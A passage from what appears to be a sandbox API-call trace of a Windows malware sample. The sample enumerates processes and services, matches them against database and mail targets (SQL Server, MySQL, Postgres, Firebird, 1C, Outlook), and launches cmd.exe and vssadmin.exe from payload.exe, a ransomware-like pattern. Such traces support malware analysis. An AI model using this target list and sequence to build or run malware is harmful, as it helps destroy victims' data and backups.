(lpString1="1c8.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0045.782] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0045.782] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.783] lstrlenW (lpString="smss.exe") returned 8 [0045.783] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0045.783] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0045.783] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.784] lstrlenW (lpString="csrss.exe") returned 9 [0045.784] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0045.784] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0045.784] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0045.784] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0045.784] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0045.784] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0045.784] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0045.784] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.785] lstrlenW (lpString="wininit.exe") returned 11 [0045.785] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0045.785] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0045.785] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0045.785] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.797] lstrlenW (lpString="csrss.exe") returned 9 [0045.797] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.798] lstrlenW (lpString="winlogon.exe") returned 12 [0045.798] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.799] lstrlenW (lpString="services.exe") returned 12 [0045.799] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.800] lstrlenW (lpString="lsass.exe") returned 9 [0045.800] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0045.800] lstrlenW (lpString="lsm.exe") returned 7 [0045.800] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.801] lstrlenW (lpString="svchost.exe") returned 11 [0045.801] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.802] lstrlenW (lpString="svchost.exe") returned 11 [0045.802] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.802] lstrlenW (lpString="svchost.exe") returned 11 [0045.803] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.803] lstrlenW (lpString="svchost.exe") returned 11 [0045.803] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.804] lstrlenW (lpString="svchost.exe") returned 11 [0045.804] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.804] lstrlenW (lpString="audiodg.exe") returned 11 [0045.805] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.805] lstrlenW (lpString="svchost.exe") returned 11 [0045.805] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.806] lstrlenW (lpString="svchost.exe") returned 11 [0045.806] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.807] lstrlenW (lpString="dwm.exe") returned 7 [0045.807] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.807] lstrlenW (lpString="explorer.exe") returned 12 [0045.807] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.808] lstrlenW (lpString="spoolsv.exe") returned 11 [0045.808] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.809] lstrlenW (lpString="taskhost.exe") returned 12 [0045.809] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.809] lstrlenW (lpString="svchost.exe") returned 11 [0045.809] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0045.810] lstrlenW (lpString="taskeng.exe") returned 11 [0045.810] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.811] lstrlenW (lpString="taskhost.exe") returned 12 [0045.811] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0045.811] lstrlenW (lpString="carried trinity.exe") returned 19 [0045.811] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0045.812] lstrlenW (lpString="heaven.exe") returned 10 [0045.812] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0045.813] lstrlenW (lpString="dell.exe") returned 8 [0045.813] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0045.813] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0045.813] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0045.814] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0045.814] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0045.815] lstrlenW (lpString="til ear equal.exe") returned 17 [0045.815] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0045.815] lstrlenW (lpString="itunes-bring.exe") returned 16 [0045.815] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0045.816] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0045.816] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0046.215] lstrlenW (lpString="philadelphia.exe") returned 16 [0046.215] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0046.216] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0046.216] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0046.216] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0046.216] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0046.217] lstrlenW (lpString="fraud stuck.exe") returned 15 [0046.217] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0046.218] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0046.218] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0046.218] lstrlenW (lpString="attended.exe") returned 12 [0046.218] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0046.219] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0046.219] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0046.220] lstrlenW (lpString="pan physician.exe") returned 17 [0046.220] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0046.220] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0046.221] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0046.221] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0046.221] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0046.222] lstrlenW (lpString="over-celebrity.exe") returned 18 [0046.222] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.222] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.223] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0046.223] lstrlenW (lpString="payload.exe") returned 11 [0046.223] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.224] lstrlenW (lpString="cmd.exe") returned 7 [0046.224] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.224] lstrlenW (lpString="conhost.exe") returned 11 [0046.224] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.225] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.225] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.226] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.226] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.227] lstrlenW (lpString="svchost.exe") returned 11 [0046.227] Process32NextW (in: hSnapshot=0x200, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.227] CloseHandle (hObject=0x200) returned 1 [0046.227] Sleep (dwMilliseconds=0x1f4) [0046.912] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626898 [0046.913] EnumServicesStatusExW (in: hSCManager=0x626898, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0046.913] GetLastError () returned 0xea [0046.913] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x628500 [0046.914] EnumServicesStatusExW (in: hSCManager=0x626898, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x628500, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x628500, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0046.914] CloseServiceHandle (hSCObject=0x626898) returned 1 [0046.914] lstrlenW (lpString="Appinfo") returned 7 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.915] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.915] lstrlenW (lpString="AudioSrv") returned 8 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.915] lstrlenW (lpString="BFE") returned 3 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.915] lstrlenW (lpString="CryptSvc") returned 8 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.915] lstrlenW (lpString="CscService") returned 10 [0046.915] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.915] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.915] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.915] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.915] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.915] lstrlenW (lpString="DcomLaunch") returned 10 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.916] lstrlenW (lpString="Dhcp") returned 4 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.916] lstrlenW (lpString="Dnscache") returned 8 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.916] lstrlenW (lpString="DPS") returned 3 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.916] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.916] lstrlenW (lpString="eventlog") returned 8 [0046.916] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.916] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.916] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.916] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.916] lstrcmpiW 